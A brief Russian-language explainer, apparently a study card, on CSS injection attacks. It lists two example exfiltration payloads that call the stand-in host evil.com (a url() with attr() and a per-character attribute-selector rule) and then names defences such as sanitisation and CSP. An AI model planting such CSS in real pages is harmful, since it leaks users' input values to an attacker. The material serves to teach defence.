Что такое CSS injection атаки?
- Внедрение вредоносного CSS через пользовательский ввод
background: url('https://evil.com/steal?data=' attr(value))— утечка данных через attr()input[value^="a"] { background: url('https://evil.com/?char=a'); }— побуквенное определение значений- Защита: санитизация пользовательского CSS, CSP, не вставлять user input в style